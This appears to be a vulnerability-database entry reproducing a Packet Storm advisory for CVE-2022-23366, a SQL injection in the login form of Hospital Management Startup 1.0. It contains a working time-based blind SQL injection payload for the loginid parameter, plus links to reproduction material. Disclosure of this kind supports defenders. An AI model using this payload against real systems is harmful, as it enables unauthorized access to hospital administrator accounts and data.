Lucene search
Nu11secur1tyPACKETSTORM:165948HistoryFeb 10, 2022 - 12:00 a.m.
Hospital Management Startup 1.0 SQL Injection
2022-02-1000:00:00
nu11secur1ty
packetstormsecurity.com
230
0.01 Low
EPSS
Percentile
84.1%
`## Title: Hospital Management Startup v1.0 remote SQL-Injections
## Author: nu11secur1ty
## Date: 02.10.2022
## Vendor: https://github.com/kabirkhyrul
## Software: https://github.com/kabirkhyrul/HMS
## CVE-2022-23366
## Description:
The loginid and password parameters from Hospital Management Startup
1.0 appear to be vulnerable to SQL injection attacks.
The attacker can retrieve all information from the administrator
account of the system and he can use the information for malicious
purposes!
WARNING: If this is in some external domain, or some subdomain, or
internal, this will be extremely dangerous!
Status: CRITICAL
[+] Payloads:
```mysql
---
Parameter: loginid (POST)
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: loginid=hackedpassword=hacked' or '6681'='6681' AND
(SELECT 1959 FROM (SELECT(SLEEP(3)))PuyC) AND
'sDHP'='sDHP&rememberme=on&submit=Login
---
```
## Reproduce:
[href](https://github.com/nu11secur1ty/CVE-mitre/edit/main/2022/CVE-2022-23366)
## Proof and Exploit:
[href](https://streamable.com/hri9eo)
`
Related
cvelist
cvelist
CVE-2022-23366
2022-01-21 22:08:47
cve
cve
CVE-2022-23366
2022-01-21 23:15:08
nvd
nvd
CVE-2022-23366
2022-01-21 23:15:08
prion
prion
Sql injection
2022-01-21 23:15:00
zdt
zdt
Hospital Management Startup 1.0 - (Multiple) SQL injection Vulnerability
2022-02-10 00:00:00
exploitdb
exploitdb
Hospital Management Startup 1.0 - 'Multiple' SQLi
2022-02-10 00:00:00